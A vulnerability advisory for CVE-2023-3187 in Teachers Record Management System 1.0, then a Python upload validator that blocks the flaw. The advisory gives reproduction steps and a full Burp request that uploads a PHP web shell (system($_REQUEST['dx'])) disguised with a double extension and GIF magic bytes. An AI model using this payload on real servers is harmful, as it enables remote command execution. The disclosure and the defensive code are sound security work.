Teachers Record Management System 1.0 Validation Bypass

14 Jun 2023 | Reported by AFFAN AHMED | Source: packetstorm (packetstormsecurity.com)

Teachers Record Management System 1.0 Validation Bypass - File upload type validation vulnerability

```text
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: https://phpgurukul.com
Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187

===============================
STEPS_TO_REPRODUCE
===============================
1. Log in to the Teacher account with the credentials “Username: [email protected], Password: Test@123”
2. Navigate to the Profile section and edit the profile picture by clicking on Edit Image
3. Open Burp Suite and intercept the Edit Image request
4. In the POST request, change the filename from “profile picture.png” to “profile picture.php.gif”
5. Change the Content-Type from “image/png” to “image/gif”
6. Add this payload: GIF89a <?php echo system($_REQUEST['dx']); ?>
7. GIF89a is the GIF magic-byte signature; this bypasses the file upload extension check
8. Below is the Burp Suite POST request with all the changes I have made above

==========================================
BURPSUITE_REQUEST
==========================================
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/trms/teacher/changeimage.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--


===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
```
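As an added illustration (not part of the advisory and not code from the Teachers Record Management System), the following Python validator shows the server-side checks that defeat the trick in the steps above: reject names with more than one extension, compare the declared Content-Type and the magic bytes against an allowlist, sanity-check the image structure, scan for PHP open tags, and store accepted files under a random name instead of the client's filename. The multipart body is rebuilt from the request above; the field name `newpic` comes from that request, and every function name here is a hypothetical choice for this example.

```python
"""Upload validation that is not fooled by a double extension plus forged magic bytes.

Added example, not code from the advisory or from the Teachers Record
Management System; all function names are assumptions for this illustration.
"""
import os
import re
import secrets
import struct

# Extension allowlist -> (MIME type the client must declare, accepted magic bytes)
ALLOWED = {
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
}
# PHP open tags: <?php, <?= and the short tag "<? "
PHP_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)


def parse_multipart(content_type, body):
    """Minimal multipart/form-data parser: list of dicts with name, filename, ctype, data."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("no boundary in Content-Type")
    delimiter = b"--" + m.group(2).encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:      # element [0] is the (empty) preamble
        if chunk.startswith(b"--"):              # closing delimiter: --boundary--
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):               # that CRLF belongs to the next delimiter
            data = data[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?<!file)name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append({"name": name.group(1) if name else None,
                      "filename": fname.group(1) if fname else None,
                      "ctype": headers.get("content-type", ""), "data": data})
    return parts


def looks_like_gif(data):
    """Cheap structural check: header, non-zero logical screen size and the 0x3B trailer."""
    if len(data) < 14 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False
    width, height = struct.unpack_from("<HH", data, 6)
    return width > 0 and height > 0 and data[-1] == 0x3B


def inspect_upload(filename, declared_type, data):
    """Return the list of policy violations; an empty list means the upload is acceptable."""
    problems = []
    pieces = os.path.basename(filename.replace("\\", "/")).lower().split(".")
    # "profile picture.php.gif" splits into three pieces: exactly one extension is allowed
    if len(pieces) != 2 or not pieces[0]:
        problems.append("filename must be <name>.<ext> with exactly one extension")
    ext = pieces[-1]
    if ext not in ALLOWED:
        problems.append("extension not in allowlist")
        return problems
    mime, magics = ALLOWED[ext]
    # The declared type is client-controlled: check it, but never rely on it alone
    if declared_type.split(";")[0].strip().lower() != mime:
        problems.append("declared Content-Type does not match extension")
    # Magic bytes are trivially forged (the advisory prepends GIF89a): only a first filter
    if not data.startswith(magics):
        problems.append("magic bytes do not match extension")
    if PHP_TAG.search(data):
        problems.append("PHP open tag inside image data")
    if ext == "gif" and not looks_like_gif(data):
        problems.append("GIF structure malformed")
    return problems


def handle_upload(content_type, body, field="newpic"):
    """Return (problems, stored_name); stored_name is None when the upload is rejected.

    Accepted files get a random name with the validated extension; the
    client-supplied filename is never reused on disk.
    """
    for part in parse_multipart(content_type, body):
        if part["name"] == field and part["filename"] is not None:
            problems = inspect_upload(part["filename"], part["ctype"], part["data"])
            if problems:
                return problems, None
            return [], secrets.token_hex(16) + "." + part["filename"].rsplit(".", 1)[1].lower()
    return ["no file part named %r" % field], None


BOUNDARY = "----WebKitFormBoundaryndAPYa0GGOxSUHdF"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def _body(filename, ctype, data):
    """Build a body shaped like the advisory's request (constructed sample input)."""
    d = ("--" + BOUNDARY).encode()
    return (d + b'\r\nContent-Disposition: form-data; name="subjects"\r\n\r\nJohn Doe\r\n'
            + d + b'\r\nContent-Disposition: form-data; name="newpic"; filename="'
            + filename.encode() + b'"\r\nContent-Type: ' + ctype.encode() + b"\r\n\r\n"
            + data + b"\r\n" + d + b'\r\nContent-Disposition: form-data; name="submit"\r\n\r\n\r\n'
            + d + b"--\r\n")


# The request from the advisory: double extension, forged magic bytes, PHP in the body
ADVISORY_BODY = _body("profile picture.php.gif", "image/gif",
                      b"GIF89a <?php echo system($_REQUEST['dx']); ?>")
# A benign header-only 1x1 GIF (constructed)
BENIGN_BODY = _body("profile picture.gif", "image/gif", b"GIF89a\x01\x00\x01\x00\x00\x00\x00;")

if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(label, handle_upload(CONTENT_TYPE, body))
```

Run stand-alone, the script rejects the advisory's request on three independent grounds (two extensions, a PHP tag in the body, no GIF trailer) and accepts the benign image under a name such as `3f9c….gif`. The random name plus a fixed allowlisted extension is what makes a stored file harmless to the web server even if one content check is fooled; serving uploads from a directory where PHP execution is disabled, or from outside the web root, removes the impact entirely. Re-encoding the image with an image library before storage is a stronger content check than the magic-byte and structure heuristics shown here.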
